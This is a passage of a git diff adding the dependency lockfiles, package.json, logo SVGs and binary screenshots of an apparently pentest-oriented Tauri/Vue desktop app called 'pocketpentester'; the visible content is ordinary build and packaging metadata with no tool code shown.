+      "integrity": "sha512-vd2F4YUyEXKGcLHoq+TEyCjxueSeHnFxyyjNp80yg0XV4vUhnDer/lvvlqM/arB5bXQN5K2/3oinyCRyx8T2CQ==",
+      "license": "MIT",
+      "dependencies": {
+        "@jridgewell/sourcemap-codec": "^1.5.5"
+      }
+    },
+    "node_modules/minimatch": {
+      "version": "9.0.9",
+      "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-9.0.9.tgz",
+      "integrity": "sha512-OBwBN9AL4dqmETlpS2zasx+vTeWclWzkblfZk7KTA5j3jeOONz/tRCnZomUyvNg83wL5Zv9Ss6HMJXAgL8R2Yg==",
+      "dev": true,
+      "license": "ISC",
+      "dependencies": {
+        "brace-expansion": "^2.0.2"
+      },
+      "engines": {
+        "node": ">=16 || 14 >=14.17"
+      },
+      "funding": {
+        "url": "https://github.com/sponsors/isaacs"
+      }
+    },
+    "node_modules/muggle-string": {
+      "version": "0.4.1",
+      "resolved": "https://registry.npmjs.org/muggle-string/-/muggle-string-0.4.1.tgz",
+      "integrity": "sha512-VNTrAak/KhO2i8dqqnqnAHOa3cYBwXEZe9h+D5h/1ZqFSTEFHdM65lR7RoIqq3tBBYavsOXV84NoHXZ0AkPyqQ==",
+      "dev": true,
+      "license": "MIT"
+    },
+    "node_modules/nanoid": {
+      "version": "3.3.11",
+      "resolved": "https://registry.npmjs.org/nanoid/-/nanoid-3.3.11.tgz",
+      "integrity": "sha512-N8SpfPUnUp1bK+PMYW8qSWdl9U+wwNWI4QKxOYDy9JAro3WMX7p2OeVRF9v+347pnakNevPmiHhNmZ2HbFA76w==",
+      "funding": [
+        {
+          "type": "github",
+          "url": "https://github.com/sponsors/ai"
+        }
+      ],
+      "license": "MIT",
+      "bin": {
+        "nanoid": "bin/nanoid.cjs"
+      },
+      "engines": {
+        "node": "^10 || ^12 || ^13.7 || ^14 || >=15.0.1"
+      }
+    },
+    "node_modules/path-browserify": {
+      "version": "1.0.1",
+      "resolved": "https://registry.npmjs.org/path-browserify/-/path-browserify-1.0.1.tgz",
+      "integrity": "sha512-b7uo2UCUOYZcnF/3ID0lulOJi/bafxa1xPe7ZPsammBSpjSWQkjNxlt635YGS2MiR9GjvuXCtz2emr3jbsz98g==",
+      "dev": true,
+      "license": "MIT"
+    },
+    "node_modules/picocolors": {
+      "version": "1.1.1",
+      "resolved": "https://registry.npmjs.org/picocolors/-/picocolors-1.1.1.tgz",
+      "integrity": "sha512-xceH2snhtb5M9liqDsmEw56le376mTZkEX/jEb/RxNFyegNul7eNslCXP9FDj/Lcu0X8KEyMceP2ntpaHrDEVA==",
+      "license": "ISC"
+    },
+    "node_modules/picomatch": {
+      "version": "4.0.4",
+      "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-4.0.4.tgz",
+      "integrity": "sha512-QP88BAKvMam/3NxH6vj2o21R6MjxZUAd6nlwAS/pnGvN9IVLocLHxGYIzFhg6fUQ+5th6P4dv4eW9jX3DSIj7A==",
+      "dev": true,
+      "license": "MIT",
+      "engines": {
+        "node": ">=12"
+      },
+      "funding": {
+        "url": "https://github.com/sponsors/jonschlinkert"
+      }
+    },
+    "node_modules/postcss": {
+      "version": "8.5.9",
+      "resolved": "https://registry.npmjs.org/postcss/-/postcss-8.5.9.tgz",
+      "integrity": "sha512-7a70Nsot+EMX9fFU3064K/kdHWZqGVY+BADLyXc8Dfv+mTLLVl6JzJpPaCZ2kQL9gIJvKXSLMHhqdRRjwQeFtw==",
+      "funding": [
+        {
+          "type": "opencollective",
+          "url": "https://opencollective.com/postcss/"
+        },
+        {
+          "type": "tidelift",
+          "url": "https://tidelift.com/funding/github/npm/postcss"
+        },
+        {
+          "type": "github",
+          "url": "https://github.com/sponsors/ai"
+        }
+      ],
+      "license": "MIT",
+      "dependencies": {
+        "nanoid": "^3.3.11",
+        "picocolors": "^1.1.1",
+        "source-map-js": "^1.2.1"
+      },
+      "engines": {
+        "node": "^10 || ^12 || >=14"
+      }
+    },
+    "node_modules/rollup": {
+      "version": "4.60.1",
+      "resolved": "https://registry.npmjs.org/rollup/-/rollup-4.60.1.tgz",
+      "integrity": "sha512-VmtB2rFU/GroZ4oL8+ZqXgSA38O6GR8KSIvWmEFv63pQ0G6KaBH9s07PO8XTXP4vI+3UJUEypOfjkGfmSBBR0w==",
+      "dev": true,
+      "license": "MIT",
+      "dependencies": {
+        "@types/estree": "1.0.8"
+      },
+      "bin": {
+        "rollup": "dist/bin/rollup"
+      },
+      "engines": {
+        "node": ">=18.0.0",
+        "npm": ">=8.0.0"
+      },
+      "optionalDependencies": {
+        "@rollup/rollup-android-arm-eabi": "4.60.1",
+        "@rollup/rollup-android-arm64": "4.60.1",
+        "@rollup/rollup-darwin-arm64": "4.60.1",
+        "@rollup/rollup-darwin-x64": "4.60.1",
+        "@rollup/rollup-freebsd-arm64": "4.60.1",
+        "@rollup/rollup-freebsd-x64": "4.60.1",
+        "@rollup/rollup-linux-arm-gnueabihf": "4.60.1",
+        "@rollup/rollup-linux-arm-musleabihf": "4.60.1",
+        "@rollup/rollup-linux-arm64-gnu": "4.60.1",
+        "@rollup/rollup-linux-arm64-musl": "4.60.1",
+        "@rollup/rollup-linux-loong64-gnu": "4.60.1",
+        "@rollup/rollup-linux-loong64-musl": "4.60.1",
+        "@rollup/rollup-linux-ppc64-gnu": "4.60.1",
+        "@rollup/rollup-linux-ppc64-musl": "4.60.1",
+        "@rollup/rollup-linux-riscv64-gnu": "4.60.1",
+        "@rollup/rollup-linux-riscv64-musl": "4.60.1",
+        "@rollup/rollup-linux-s390x-gnu": "4.60.1",
+        "@rollup/rollup-linux-x64-gnu": "4.60.1",
+        "@rollup/rollup-linux-x64-musl": "4.60.1",
+        "@rollup/rollup-openbsd-x64": "4.60.1",
+        "@rollup/rollup-openharmony-arm64": "4.60.1",
+        "@rollup/rollup-win32-arm64-msvc": "4.60.1",
+        "@rollup/rollup-win32-ia32-msvc": "4.60.1",
+        "@rollup/rollup-win32-x64-gnu": "4.60.1",
+        "@rollup/rollup-win32-x64-msvc": "4.60.1",
+        "fsevents": "~2.3.2"
+      }
+    },
+    "node_modules/source-map-js": {
+      "version": "1.2.1",
+      "resolved": "https://registry.npmjs.org/source-map-js/-/source-map-js-1.2.1.tgz",
+      "integrity": "sha512-UXWMKhLOwVKb728IUtQPXxfYU+usdybtUrK/8uGE8CQMvrhOpwvzDBwj0QhSL7MQc7vIsISBG8VQ8+IDQxpfQA==",
+      "license": "BSD-3-Clause",
+      "engines": {
+        "node": ">=0.10.0"
+      }
+    },
+    "node_modules/tinyglobby": {
+      "version": "0.2.16",
+      "resolved": "https://registry.npmjs.org/tinyglobby/-/tinyglobby-0.2.16.tgz",
+      "integrity": "sha512-pn99VhoACYR8nFHhxqix+uvsbXineAasWm5ojXoN8xEwK5Kd3/TrhNn1wByuD52UxWRLy8pu+kRMniEi6Eq9Zg==",
+      "dev": true,
+      "license": "MIT",
+      "dependencies": {
+        "fdir": "^6.5.0",
+        "picomatch": "^4.0.4"
+      },
+      "engines": {
+        "node": ">=12.0.0"
+      },
+      "funding": {
+        "url": "https://github.com/sponsors/SuperchupuDev"
+      }
+    },
+    "node_modules/typescript": {
+      "version": "5.6.3",
+      "resolved": "https://registry.npmjs.org/typescript/-/typescript-5.6.3.tgz",
+      "integrity": "sha512-hjcS1mhfuyi4WW8IWtjP7brDrG2cuDZukyrYrSauoXGNgx0S7zceP07adYkJycEr56BOUTNPzbInooiN3fn1qw==",
+      "devOptional": true,
+      "license": "Apache-2.0",
+      "bin": {
+        "tsc": "bin/tsc",
+        "tsserver": "bin/tsserver"
+      },
+      "engines": {
+        "node": ">=14.17"
+      }
+    },
+    "node_modules/vite": {
+      "version": "6.4.2",
+      "resolved": "https://registry.npmjs.org/vite/-/vite-6.4.2.tgz",
+      "integrity": "sha512-2N/55r4JDJ4gdrCvGgINMy+HH3iRpNIz8K6SFwVsA+JbQScLiC+clmAxBgwiSPgcG9U15QmvqCGWzMbqda5zGQ==",
+      "dev": true,
+      "license": "MIT",
+      "dependencies": {
+        "esbuild": "^0.25.0",
+        "fdir": "^6.4.4",
+        "picomatch": "^4.0.2",
+        "postcss": "^8.5.3",
+        "rollup": "^4.34.9",
+        "tinyglobby": "^0.2.13"
+      },
+      "bin": {
+        "vite": "bin/vite.js"
+      },
+      "engines": {
+        "node": "^18.0.0 || ^20.0.0 || >=22.0.0"
+      },
+      "funding": {
+        "url": "https://github.com/vitejs/vite?sponsor=1"
+      },
+      "optionalDependencies": {
+        "fsevents": "~2.3.3"
+      },
+      "peerDependencies": {
+        "@types/node": "^18.0.0 || ^20.0.0 || >=22.0.0",
+        "jiti": ">=1.21.0",
+        "less": "*",
+        "lightningcss": "^1.21.0",
+        "sass": "*",
+        "sass-embedded": "*",
+        "stylus": "*",
+        "sugarss": "*",
+        "terser": "^5.16.0",
+        "tsx": "^4.8.1",
+        "yaml": "^2.4.2"
+      },
+      "peerDependenciesMeta": {
+        "@types/node": {
+          "optional": true
+        },
+        "jiti": {
+          "optional": true
+        },
+        "less": {
+          "optional": true
+        },
+        "lightningcss": {
+          "optional": true
+        },
+        "sass": {
+          "optional": true
+        },
+        "sass-embedded": {
+          "optional": true
+        },
+        "stylus": {
+          "optional": true
+        },
+        "sugarss": {
+          "optional": true
+        },
+        "terser": {
+          "optional": true
+        },
+        "tsx": {
+          "optional": true
+        },
+        "yaml": {
+          "optional": true
+        }
+      }
+    },
+    "node_modules/vscode-uri": {
+      "version": "3.1.0",
+      "resolved": "https://registry.npmjs.org/vscode-uri/-/vscode-uri-3.1.0.tgz",
+      "integrity": "sha512-/BpdSx+yCQGnCvecbyXdxHDkuk55/G3xwnC0GqY4gmQ3j+A+g8kzzgB4Nk/SINjqn6+waqw3EgbVF2QKExkRxQ==",
+      "dev": true,
+      "license": "MIT"
+    },
+    "node_modules/vue": {
+      "version": "3.5.32",
+      "resolved": "https://registry.npmjs.org/vue/-/vue-3.5.32.tgz",
+      "integrity": "sha512-vM4z4Q9tTafVfMAK7IVzmxg34rSzTFMyIe0UUEijUCkn9+23lj0WRfA83dg7eQZIUlgOSGrkViIaCfqSAUXsMw==",
+      "license": "MIT",
+      "dependencies": {
+        "@vue/compiler-dom": "3.5.32",
+        "@vue/compiler-sfc": "3.5.32",
+        "@vue/runtime-dom": "3.5.32",
+        "@vue/server-renderer": "3.5.32",
+        "@vue/shared": "3.5.32"
+      },
+      "peerDependencies": {
+        "typescript": "*"
+      },
+      "peerDependenciesMeta": {
+        "typescript": {
+          "optional": true
+        }
+      }
+    },
+    "node_modules/vue-tsc": {
+      "version": "2.2.12",
+      "resolved": "https://registry.npmjs.org/vue-tsc/-/vue-tsc-2.2.12.tgz",
+      "integrity": "sha512-P7OP77b2h/Pmk+lZdJ0YWs+5tJ6J2+uOQPo7tlBnY44QqQSPYvS0qVT4wqDJgwrZaLe47etJLLQRFia71GYITw==",
+      "dev": true,
+      "license": "MIT",
+      "dependencies": {
+        "@volar/typescript": "2.4.15",
+        "@vue/language-core": "2.2.12"
+      },
+      "bin": {
+        "vue-tsc": "bin/vue-tsc.js"
+      },
+      "peerDependencies": {
+        "typescript": ">=5.0.0"
+      }
+    }
+  }
+}
diff --git a/package.json b/package.json
new file mode 100644
index 0000000..8f05aa6
--- /dev/null
+++ b/package.json
@@ -0,0 +1,24 @@
+{
+  "name": "pocketpentester",
+  "private": true,
+  "version": "0.1.0",
+  "type": "module",
+  "scripts": {
+    "dev": "vite",
+    "build": "vue-tsc --noEmit && vite build",
+    "preview": "vite preview",
+    "tauri": "tauri"
+  },
+  "dependencies": {
+    "vue": "^3.5.13",
+    "@tauri-apps/api": "^2",
+    "@tauri-apps/plugin-opener": "^2"
+  },
+  "devDependencies": {
+    "@vitejs/plugin-vue": "^5.2.1",
+    "typescript": "~5.6.2",
+    "vite": "^6.0.3",
+    "vue-tsc": "^2.1.10",
+    "@tauri-apps/cli": "^2"
+  }
+}
diff --git a/public/favicon-32.png b/public/favicon-32.png
new file mode 100644
index 0000000..b01ebf9
Binary files /dev/null and b/public/favicon-32.png differ
diff --git a/public/imtaqin.png b/public/imtaqin.png
new file mode 100644
index 0000000..759ad3f
Binary files /dev/null and b/public/imtaqin.png differ
diff --git a/public/tauri.svg b/public/tauri.svg
new file mode 100644
index 0000000..31b62c9
--- /dev/null
+++ b/public/tauri.svg
@@ -0,0 +1,6 @@
+<svg width="206" height="231" viewBox="0 0 206 231" fill="none" xmlns="http://www.w3.org/2000/svg">
+<path d="M143.143 84C143.143 96.1503 133.293 106 121.143 106C108.992 106 99.1426 96.1503 99.1426 84C99.1426 71.8497 108.992 62 121.143 62C133.293 62 143.143 71.8497 143.143 84Z" fill="#FFC131"/>
+<ellipse cx="84.1426" cy="147" rx="22" ry="22" transform="rotate(180 84.1426 147)" fill="#24C8DB"/>
+<path fill-rule="evenodd" clip-rule="evenodd" d="M166.738 154.548C157.86 160.286 148.023 164.269 137.757 166.341C139.858 160.282 141 153.774 141 147C141 144.543 140.85 142.121 140.558 139.743C144.975 138.204 149.215 136.139 153.183 133.575C162.73 127.404 170.292 118.608 174.961 108.244C179.63 97.8797 181.207 86.3876 179.502 75.1487C177.798 63.9098 172.884 53.4021 165.352 44.8883C157.82 36.3744 147.99 30.2165 137.042 27.1546C126.095 24.0926 114.496 24.2568 103.64 27.6274C92.7839 30.998 83.1319 37.4317 75.8437 46.1553C74.9102 47.2727 74.0206 48.4216 73.176 49.5993C61.9292 50.8488 51.0363 54.0318 40.9629 58.9556C44.2417 48.4586 49.5653 38.6591 56.679 30.1442C67.0505 17.7298 80.7861 8.57426 96.2354 3.77762C111.685 -1.01901 128.19 -1.25267 143.769 3.10474C159.348 7.46215 173.337 16.2252 184.056 28.3411C194.775 40.457 201.767 55.4101 204.193 71.404C206.619 87.3978 204.374 103.752 197.73 118.501C191.086 133.25 180.324 145.767 166.738 154.548ZM41.9631 74.275L62.5557 76.8042C63.0459 72.813 63.9401 68.9018 65.2138 65.1274C57.0465 67.0016 49.2088 70.087 41.9631 74.275Z" fill="#FFC131"/>
+<path fill-rule="evenodd" clip-rule="evenodd" d="M38.4045 76.4519C47.3493 70.6709 57.2677 66.6712 67.6171 64.6132C65.2774 70.9669 64 77.8343 64 85.0001C64 87.1434 64.1143 89.26 64.3371 91.3442C60.0093 92.8732 55.8533 94.9092 51.9599 97.4256C42.4128 103.596 34.8505 112.392 30.1816 122.756C25.5126 133.12 23.9357 144.612 25.6403 155.851C27.3449 167.09 32.2584 177.598 39.7906 186.112C47.3227 194.626 57.153 200.784 68.1003 203.846C79.0476 206.907 90.6462 206.743 101.502 203.373C112.359 200.002 122.011 193.568 129.299 184.845C130.237 183.722 131.131 182.567 131.979 181.383C143.235 180.114 154.132 176.91 164.205 171.962C160.929 182.49 155.596 192.319 148.464 200.856C138.092 213.27 124.357 222.426 108.907 227.222C93.458 232.019 76.9524 232.253 61.3736 227.895C45.7948 223.538 31.8055 214.775 21.0867 202.659C10.3679 190.543 3.37557 175.59 0.949823 159.596C-1.47592 143.602 0.768139 127.248 7.41237 112.499C14.0566 97.7497 24.8183 85.2327 38.4045 76.4519ZM163.062 156.711L163.062 156.711C162.954 156.773 162.846 156.835 162.738 156.897C162.846 156.835 162.954 156.773 163.062 156.711Z" fill="#24C8DB"/>
+</svg>
diff --git a/public/tegalsec.png b/public/tegalsec.png
new file mode 100644
index 0000000..ff8a1c3
Binary files /dev/null and b/public/tegalsec.png differ
diff --git a/public/vite.svg b/public/vite.svg
new file mode 100644
index 0000000..e7b8dfb
--- /dev/null
+++ b/public/vite.svg
@@ -0,0 +1 @@
+<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" aria-hidden="true" role="img" class="iconify iconify--logos" width="31.88" height="32" preserveAspectRatio="xMidYMid meet" viewBox="0 0 256 257"><defs><linearGradient id="IconifyId1813088fe1fbc01fb466" x1="-.828%" x2="57.636%" y1="7.652%" y2="78.411%"><stop offset="0%" stop-color="#41D1FF"></stop><stop offset="100%" stop-color="#BD34FE"></stop></linearGradient><linearGradient id="IconifyId1813088fe1fbc01fb467" x1="43.376%" x2="50.316%" y1="2.242%" y2="89.03%"><stop offset="0%" stop-color="#FFEA83"></stop><stop offset="8.333%" stop-color="#FFDD35"></stop><stop offset="100%" stop-color="#FFA800"></stop></linearGradient></defs><path fill="url(#IconifyId1813088fe1fbc01fb466)" d="M255.153 37.938L134.897 252.976c-2.483 4.44-8.862 4.466-11.382.048L.875 37.958c-2.746-4.814 1.371-10.646 6.827-9.67l120.385 21.517a6.537 6.537 0 0 0 2.322-.004l117.867-21.483c5.438-.991 9.574 4.796 6.877 9.62Z"></path><path fill="url(#IconifyId1813088fe1fbc01fb467)" d="M185.432.063L96.44 17.501a3.268 3.268 0 0 0-2.634 3.014l-5.474 92.456a3.268 3.268 0 0 0 3.997 3.378l24.777-5.718c2.318-.535 4.413 1.507 3.936 3.838l-7.361 36.047c-.495 2.426 1.782 4.5 4.151 3.78l15.304-4.649c2.372-.72 4.652 1.36 4.15 3.788l-11.698 56.621c-.732 3.542 3.979 5.473 5.943 2.437l1.313-2.028l72.516-144.72c1.215-2.423-.88-5.186-3.54-4.672l-25.505 4.922c-2.396.462-4.435-1.77-3.759-4.114l16.646-57.705c.677-2.35-1.37-4.583-3.769-4.113Z"></path></svg>
\ No newline at end of file
diff --git a/screenshot/admin-finder.png b/screenshot/admin-finder.png
new file mode 100644
index 0000000..69ab4db
Binary files /dev/null and b/screenshot/admin-finder.png differ
diff --git a/screenshot/auto-pwn.png b/screenshot/auto-pwn.png
new file mode 100644
index 0000000..7262f31
Binary files /dev/null and b/screenshot/auto-pwn.png differ
diff --git a/screenshot/dir-fuzz.png b/screenshot/dir-fuzz.png
new file mode 100644
index 0000000..3191a22
Binary files /dev/null and b/screenshot/dir-fuzz.png differ
diff --git a/screenshot/form-brute.png b/screenshot/form-brute.png
new file mode 100644
index 0000000..74aed7a
Binary files /dev/null and b/screenshot/form-brute.png differ
diff --git a/screenshot/http-probe.png b/screenshot/http-probe.png
new file mode 100644
index 0000000..c43af6e
Binary files /dev/null and b/screenshot/http-probe.png differ
diff --git a/screenshot/http-prove b/screenshot/http-prove
new file mode 100644
index 0000000..01060c8
Binary files /dev/null and b/screenshot/http-prove differ
diff --git a/screenshot/jwt.png b/screenshot/jwt.png
new file mode 100644
index 0000000..d04626c
Binary files /dev/null and b/screenshot/jwt.png differ
diff --git a/screenshot/jwtg b/screenshot/jwtg
new file mode 100644
index 0000000..c892238
Binary files /dev/null and b/screenshot/jwtg differ
diff --git a/screenshot/port-scan.png b/screenshot/port-scan.png
new file mode 100644
index 0000000..0a39bf2
Binary files /dev/null and b/screenshot/port-scan.png differ
diff --git a/screenshot/screenshot.png b/screenshot/screenshot.png
new file mode 100644
index 0000000..28a911b
Binary files /dev/null and b/screenshot/screenshot.png differ
diff --git a/screenshot/splash.png b/screenshot/splash.png
new file mode 100644
index 0000000..f23691a
Binary files /dev/null and b/screenshot/splash.png differ
diff --git a/screenshot/sqli-scan.png b/screenshot/sqli-scan.png
new file mode 100644
index 0000000..4fae688
Binary files /dev/null and b/screenshot/sqli-scan.png differ
diff --git a/screenshot/subdo-scan.png b/screenshot/subdo-scan.png
new file mode 100644
index 0000000..0ced011
Binary files /dev/null and b/screenshot/subdo-scan.png differ
diff --git a/screenshot/subdomain-takeover.png b/screenshot/subdomain-takeover.png
new file mode 100644
index 0000000..0f9f6bd
Binary files /dev/null and b/screenshot/subdomain-takeover.png differ
diff --git a/screenshot/xploiter.png b/screenshot/xploiter.png
new file mode 100644
index 0000000..85997f4
Binary files /dev/null and b/screenshot/xploiter.png differ
diff --git a/screenshot/xss-scan.png b/screenshot/xss-scan.png
new file mode 100644
index 0000000..3dab7d4
Binary files /dev/null and b/screenshot/xss-scan.png differ
diff --git a/src-tauri/.gitignore b/src-tauri/.gitignore
new file mode 100644
index 0000000..b21bd68
--- /dev/null
+++ b/src-tauri/.gitignore
@@ -0,0 +1,7 @@
+# Generated by Cargo
+# will have compiled files and executables
+/target/
+
+# Generated by Tauri
+# will have schema files for capabilities auto-completion
+/gen/schemas
diff --git a/src-tauri/Cargo.lock b/src-tauri/Cargo.lock
new file mode 100644
index 0000000..2c7e457
--- /dev/null
+++ b/src-tauri/Cargo.lock
@@ -0,0 +1,6321 @@
+# This file is automatically @generated by Cargo.
+# It is not intended for manual editing.
+version = 4
+
+[[package]]
+name = "adler2"
+version = "2.0.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "320119579fcad9c21884f5c4861d16174d0e06250625266f50fe6898340abefa"
+
+[[package]]
+name = "aho-corasick"
+version = "1.1.4"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "ddd31a130427c27518df266943a5308ed92d4b226cc639f5a8f1002816174301"
+dependencies = [
+ "memchr",
+]
+
+[[package]]
+name = "alloc-no-stdlib"
+version = "2.0.4"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "cc7bb162ec39d46ab1ca8c77bf72e890535becd1751bb45f64c597edb4c8c6b3"
+
+[[package]]
+name = "alloc-stdlib"
+version = "0.2.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "94fb8275041c72129eb51b7d0322c29b8387a0386127718b096429201a5d6ece"
+dependencies = [
+ "alloc-no-stdlib",
+]
+
+[[package]]
+name = "android_system_properties"
+version = "0.1.5"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "819e7219dbd41043ac279b19830f2efc897156490d7fd6ea916720117ee66311"
+dependencies = [
+ "libc",
+]
+
+[[package]]
+name = "anyhow"
+version = "1.0.102"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "7f202df86484c868dbad7eaa557ef785d5c66295e41b460ef922eca0723b842c"
+
+[[package]]
+name = "asn1-rs"
+version = "0.7.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "56624a96882bb8c26d61312ae18cb45868e5a9992ea73c58e45c3101e56a1e60"
+dependencies = [
+ "asn1-rs-derive",
+ "asn1-rs-impl",
+ "displaydoc",
+ "nom",
+ "num-traits",
+ "rusticata-macros",
+ "thiserror 2.0.18",
+ "time",
+]
+
+[[package]]
+name = "asn1-rs-derive"
+version = "0.6.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "3109e49b1e4909e9db6515a30c633684d68cdeaa252f215214cb4fa1a5bfee2c"
+dependencies = [
+ "proc-macro2",
+ "quote",
+ "syn 2.0.117",
+ "synstructure",
+]
+
+[[package]]
+name = "asn1-rs-impl"
+version = "0.2.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "7b18050c2cd6fe86c3a76584ef5e0baf286d038cda203eb6223df2cc413565f7"
+dependencies = [
+ "proc-macro2",
+ "quote",
+ "syn 2.0.117",
+]
+
+[[package]]
+name = "async-broadcast"
+version = "0.7.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "435a87a52755b8f27fcf321ac4f04b2802e337c8c4872923137471ec39c37532"
+dependencies = [
+ "event-listener",
+ "event-listener-strategy",
+ "futures-core",
+ "pin-project-lite",
+]
+
+[[package]]
+name = "async-channel"
+version = "2.5.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "924ed96dd52d1b75e9c1a3e6275715fd320f5f9439fb5a4a11fa51f4221158d2"
+dependencies = [
+ "concurrent-queue",
+ "event-listener-strategy",
+ "futures-core",
+ "pin-project-lite",
+]
+
+[[package]]
+name = "async-compression"
+version = "0.4.41"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "d0f9ee0f6e02ffd7ad5816e9464499fba7b3effd01123b515c41d1697c43dad1"
+dependencies = [
+ "compression-codecs",
+ "compression-core",
+ "pin-project-lite",
+ "tokio",
+]
+
+[[package]]
+name = "async-executor"
+version = "1.14.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "c96bf972d85afc50bf5ab8fe2d54d1586b4e0b46c97c50a0c9e71e2f7bcd812a"
+dependencies = [
+ "async-task",
+ "concurrent-queue",
+ "fastrand",
+ "futures-lite",
+ "pin-project-lite",
+ "slab",
+]
+
+[[package]]
+name = "async-io"
+version = "2.6.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "456b8a8feb6f42d237746d4b3e9a178494627745c3c56c6ea55d92ba50d026fc"
+dependencies = [
+ "autocfg",
+ "cfg-if",
+ "concurrent-queue",
+ "futures-io",
+ "futures-lite",
+ "parking",
+ "polling",
+ "rustix",
+ "slab",
+ "windows-sys 0.61.2",
+]
+
+[[package]]
+name = "async-lock"
+version = "3.4.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "290f7f2596bd5b78a9fec8088ccd89180d7f9f55b94b0576823bbbdc72ee8311"
+dependencies = [
+ "event-listener",
+ "event-listener-strategy",
+ "pin-project-lite",
+]
+
+[[package]]
+name = "async-process"
+version = "2.5.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "fc50921ec0055cdd8a16de48773bfeec5c972598674347252c0399676be7da75"
+dependencies = [
+ "async-channel",
+ "async-io",
+ "async-lock",
+ "async-signal",
+ "async-task",
+ "blocking",
+ "cfg-if",
+ "event-listener",
+ "futures-lite",
+ "rustix",
+]
+
+[[package]]
+name = "async-recursion"
+version = "1.1.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "3b43422f69d8ff38f95f1b2bb76517c91589a924d1559a0e935d7c8ce0274c11"
+dependencies = [
+ "proc-macro2",
+ "quote",
+ "syn 2.0.117",
+]
+
+[[package]]
+name = "async-signal"
+version = "0.2.14"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "52b5aaafa020cf5053a01f2a60e8ff5dccf550f0f77ec54a4e47285ac2bab485"
+dependencies = [
+ "async-io",
+ "async-lock",
+ "atomic-waker",
+ "cfg-if",
+ "futures-core",
+ "futures-io",
+ "rustix",
+ "signal-hook-registry",
+ "slab",
+ "windows-sys 0.61.2",
+]
+
+[[package]]
+name = "async-task"
+version = "4.7.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "8b75356056920673b02621b35afd0f7dda9306d03c79a30f5c56c44cf256e3de"
+
+[[package]]
+name = "async-trait"
+version = "0.1.89"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "9035ad2d096bed7955a320ee7e2230574d28fd3c3a0f186cbea1ff3c7eed5dbb"
+dependencies = [
+ "proc-macro2",
+ "quote",
+ "syn 2.0.117",
+]
+
+[[package]]
+name = "atk"
+version = "0.18.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "241b621213072e993be4f6f3a9e4b45f65b7e6faad43001be957184b7bb1824b"
+dependencies = [
+ "atk-sys",
+ "glib",
+ "libc",
+]
+
+[[package]]
+name = "atk-sys"
+version = "0.18.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "c5e48b684b0ca77d2bbadeef17424c2ea3c897d44d566a1617e7e8f30614d086"
+dependencies = [
+ "glib-sys",
+ "gobject-sys",
+ "libc",
+ "system-deps",
+]
+
+[[package]]
+name = "atomic-waker"
+version = "1.1.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "1505bd5d3d116872e7271a6d4e16d81d0c8570876c8de68093a09ac269d8aac0"
+
+[[package]]
+name = "autocfg"
+version = "1.5.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "c08606f8c3cbf4ce6ec8e28fb0014a2c086708fe954eaa885384a6165172e7e8"
+
+[[package]]
+name = "base64"
+version = "0.21.7"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "9d297deb1925b89f2ccc13d7635fa0714f12c87adce1c75356b39ca9b7178567"
+
+[[package]]
+name = "base64"
+version = "0.22.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "72b3254f16251a8381aa12e40e3c4d2f0199f8c6508fbecb9d91f575e0fbb8c6"
+
+[[package]]
+name = "bit-set"
+version = "0.8.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "08807e080ed7f9d5433fa9b275196cfc35414f66a0c79d864dc51a0d825231a3"
+dependencies = [
+ "bit-vec",
+]
+
+[[package]]
+name = "bit-vec"
+version = "0.8.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "5e764a1d40d510daf35e07be9eb06e75770908c27d411ee6c92109c9840eaaf7"
+
+[[package]]
+name = "bitflags"
+version = "1.3.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "bef38d45163c2f1dde094a7dfd33ccf595c92905c8f8f4fdc18d06fb1037718a"
+
+[[package]]
+name = "bitflags"
+version = "2.11.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "c4512299f36f043ab09a583e57bceb5a5aab7a73db1805848e8fef3c9e8c78b3"
+dependencies = [
+ "serde_core",
+]
+
+[[package]]
+name = "block-buffer"
+version = "0.10.4"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "3078c7629b62d3f0439517fa394996acacc5cbc91c5a20d8c658e77abd503a71"
+dependencies = [
+ "generic-array",
+]
+
+[[package]]
+name = "block2"
+version = "0.6.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "cdeb9d870516001442e364c5220d3574d2da8dc765554b4a617230d33fa58ef5"
+dependencies = [
+ "objc2",
+]
+
+[[package]]
+name = "blocking"
+version = "1.6.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "e83f8d02be6967315521be875afa792a316e28d57b5a2d401897e2a7921b7f21"
+dependencies = [
+ "async-channel",
+ "async-task",
+ "futures-io",
+ "futures-lite",
+ "piper",
+]
+
+[[package]]
